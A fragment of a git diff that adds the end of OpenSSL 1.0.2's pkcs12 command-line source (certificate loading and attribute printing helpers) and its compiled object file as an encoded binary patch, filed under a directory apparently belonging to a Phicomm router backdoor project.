+    BIO_printf(bio_err, "%s, Iteration %ld\n",
+               OBJ_nid2ln(OBJ_obj2nid(alg->algorithm)),
+               ASN1_INTEGER_get(pbe->iter));
+    PBEPARAM_free(pbe);
+    return 1;
+}
+
+/* Load all certificates from a given file */
+
+int cert_load(BIO *in, STACK_OF(X509) *sk)
+{
+    int ret;
+    X509 *cert;
+    ret = 0;
+# ifdef CRYPTO_MDEBUG
+    CRYPTO_push_info("cert_load(): reading one cert");
+# endif
+    while ((cert = PEM_read_bio_X509(in, NULL, NULL, NULL))) {
+# ifdef CRYPTO_MDEBUG
+        CRYPTO_pop_info();
+# endif
+        ret = 1;
+        sk_X509_push(sk, cert);
+# ifdef CRYPTO_MDEBUG
+        CRYPTO_push_info("cert_load(): reading one cert");
+# endif
+    }
+# ifdef CRYPTO_MDEBUG
+    CRYPTO_pop_info();
+# endif
+    if (ret)
+        ERR_clear_error();
+    return ret;
+}
+
+/* Generalised attribute print: handle PKCS#8 and bag attributes */
+
+int print_attribs(BIO *out, STACK_OF(X509_ATTRIBUTE) *attrlst,
+                  const char *name)
+{
+    X509_ATTRIBUTE *attr;
+    ASN1_TYPE *av;
+    char *value;
+    int i, attr_nid;
+    if (!attrlst) {
+        BIO_printf(out, "%s: <No Attributes>\n", name);
+        return 1;
+    }
+    if (!sk_X509_ATTRIBUTE_num(attrlst)) {
+        BIO_printf(out, "%s: <Empty Attributes>\n", name);
+        return 1;
+    }
+    BIO_printf(out, "%s\n", name);
+    for (i = 0; i < sk_X509_ATTRIBUTE_num(attrlst); i++) {
+        attr = sk_X509_ATTRIBUTE_value(attrlst, i);
+        attr_nid = OBJ_obj2nid(attr->object);
+        BIO_printf(out, "    ");
+        if (attr_nid == NID_undef) {
+            i2a_ASN1_OBJECT(out, attr->object);
+            BIO_printf(out, ": ");
+        } else
+            BIO_printf(out, "%s: ", OBJ_nid2ln(attr_nid));
+
+        if (sk_ASN1_TYPE_num(attr->value.set)) {
+            av = sk_ASN1_TYPE_value(attr->value.set, 0);
+            switch (av->type) {
+            case V_ASN1_BMPSTRING:
+                value = OPENSSL_uni2asc(av->value.bmpstring->data,
+                                        av->value.bmpstring->length);
+                BIO_printf(out, "%s\n", value);
+                OPENSSL_free(value);
+                break;
+
+            case V_ASN1_OCTET_STRING:
+                hex_prin(out, av->value.octet_string->data,
+                         av->value.octet_string->length);
+                BIO_printf(out, "\n");
+                break;
+
+            case V_ASN1_BIT_STRING:
+                hex_prin(out, av->value.bit_string->data,
+                         av->value.bit_string->length);
+                BIO_printf(out, "\n");
+                break;
+
+            default:
+                BIO_printf(out, "<Unsupported tag %d>\n", av->type);
+                break;
+            }
+        } else
+            BIO_printf(out, "<No Values>\n");
+    }
+    return 1;
+}
+
+void hex_prin(BIO *out, unsigned char *buf, int len)
+{
+    int i;
+    for (i = 0; i < len; i++)
+        BIO_printf(out, "%02X ", buf[i]);
+}
+
+static int set_pbe(BIO *err, int *ppbe, const char *str)
+{
+    if (!str)
+        return 0;
+    if (!strcmp(str, "NONE")) {
+        *ppbe = -1;
+        return 1;
+    }
+    *ppbe = OBJ_txt2nid(str);
+    if (*ppbe == NID_undef) {
+        BIO_printf(bio_err, "Unknown PBE algorithm %s\n", str);
+        return 0;
+    }
+    return 1;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs12.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs12.o
new file mode 100644
index 0000000000000000000000000000000000000000..574a934fb8832231065ffcbce5e6395f520d4930
GIT binary patch
literal 33960
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
